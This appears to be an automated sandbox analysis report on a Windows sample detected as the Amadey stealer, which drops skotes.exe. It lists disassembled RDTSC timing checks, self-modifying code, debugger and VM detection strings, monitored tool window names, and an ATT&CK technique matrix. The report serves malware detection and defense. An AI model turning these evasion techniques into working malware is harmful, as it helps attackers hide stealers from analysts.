Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D08E9 second address: 53D08EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D08EF second address: 53D09B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C8AE007Bh 0x00000008 call 00007F43C8AE0088h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 test esi, esi 0x00000013 jmp 00007F43C8AE0081h 0x00000018 je 00007F443AAB5AD8h 0x0000001e jmp 00007F43C8AE007Eh 0x00000023 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002a pushad 0x0000002b mov bx, cx 0x0000002e mov dh, ch 0x00000030 popad 0x00000031 mov ecx, esi 0x00000033 jmp 00007F43C8AE0085h 0x00000038 je 00007F443AAB5AB4h 0x0000003e pushad 0x0000003f movzx ecx, dx 0x00000042 pushfd 0x00000043 jmp 00007F43C8AE0089h 0x00000048 or ah, FFFFFFF6h 0x0000004b jmp 00007F43C8AE0081h 0x00000050 popfd 0x00000051 popad 0x00000052 test byte ptr [77436968h], 00000002h 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F43C8AE007Dh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D09B5 second address: 53D0A2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF7h 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F443B06E6C7h 0x00000014 pushad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 popad 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007F43C9098CF5h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF9h 0x0000002c or ecx, 3FBB7C76h 0x00000032 jmp 00007F43C9098CF1h 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0A2F second address: 53D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F43C8AE0083h 0x0000000e jmp 00007F43C8AE0088h 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F43C8AE0080h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F43C8AE0080h 0x00000020 push eax 0x00000021 jmp 00007F43C8AE007Bh 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F43C8AE0084h 0x0000002e xor cx, D0B8h 0x00000033 jmp 00007F43C8AE007Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F43C8AE0088h 0x0000003f and cl, 00000018h 0x00000042 jmp 00007F43C8AE007Bh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+14h] 0x0000004c jmp 00007F43C8AE0086h 0x00000051 push dword ptr [ebp+10h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 mov eax, 57F51653h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0B59 second address: 53D0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, al 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0B60 second address: 53D0B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0B7B second address: 53D0B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43C9098CF0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0B96 second address: 53D0BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0BA8 second address: 53D0BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0BAC second address: 53D0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 jmp 00007F43C8AE0087h 0x0000000e mov esp, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov esi, edx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0BD7 second address: 53D0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53D0BDD second address: 53D0BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0D88 second address: 53E0D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0D8C second address: 53E0D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53E0A8D second address: 53E0A93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450E73 second address: 5450E79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450E79 second address: 5450E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450E7D second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450EAB second address: 5450EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 1599C5F9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450EB5 second address: 5450ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450514 second address: 5450530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 545033A second address: 545038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 48786F68h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov ebx, 19C13044h 0x0000001a pushfd 0x0000001b jmp 00007F43C8AE007Dh 0x00000020 sub eax, 7724E186h 0x00000026 jmp 00007F43C8AE0081h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F43C8AE007Dh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 545038C second address: 54503A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54503A8 second address: 54503AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54503AC second address: 54503B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F0167 second address: 53F01C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Ah 0x00000011 or esi, 610588F8h 0x00000017 jmp 00007F43C8AE007Bh 0x0000001c popfd 0x0000001d call 00007F43C8AE0088h 0x00000022 movzx ecx, di 0x00000025 pop edi 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 jmp 00007F43C8AE0083h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F01C5 second address: 53F01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 53F01C9 second address: 53F0229 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F43C8AE0084h 0x00000008 adc ecx, 16CF34E8h 0x0000000e jmp 00007F43C8AE007Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43C8AE0084h 0x0000001f add si, 4748h 0x00000024 jmp 00007F43C8AE007Bh 0x00000029 popfd 0x0000002a mov ax, 4EBFh 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov dl, B8h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 5450686 second address: 545068C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 545068C second address: 54506AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bl, ah 0x0000000e mov edx, 26EF6E4Eh 0x00000013 popad 0x00000014 push dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54506AE second address: 54506B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54506B2 second address: 54506C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54506C0 second address: 54506D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54506D2 second address: 54506F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, 22EEA83Fh 0x00000011 popad 0x00000012 push 912E01ADh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F43C8AE007Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 54506F9 second address: 545070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: 545070B second address: 545070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: C4EBCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: C4EC6B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: E098B4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: E37BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: E1084E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Special instruction interceptor: First address: E9AC13 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: FCEBCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: FCEC6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11898B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 11B7BA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 119084E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 121AC13 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Code function: 0_2_05450654 rdtsc

0_2_05450654

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1081	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 511	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1316	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1201	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2836	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512	Thread sleep count: 1081 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6512	Thread sleep time: -2163081s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788	Thread sleep count: 511 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6788	Thread sleep time: -15330000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2848	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856	Thread sleep count: 1316 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4856	Thread sleep time: -2633316s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396	Thread sleep count: 1201 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5396	Thread sleep time: -2403201s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW[
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msqT9atzYW.exe, 00000000.00000002.2266464940.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2299739662.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2311366015.0000000001167000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\msqT9atzYW.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Code function: 0_2_05450654 rdtsc

0_2_05450654

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F9652B mov eax, dword ptr fs:[00000030h]		7_2_00F9652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F9A302 mov eax, dword ptr fs:[00000030h]		7_2_00F9A302

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Jump to behavior

Source: skotes.exe, skotes.exe, 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: EProgram Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00F7D3E2 cpuid

7_2_00F7D3E2

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00F7CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_00F7CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00F665E0 LookupAccountNameA,

7_2_00F665E0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 7.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msqT9atzYW.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2311270072.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2764127770.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2266387478.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2299648103.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2226138822.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2258806341.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	224 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
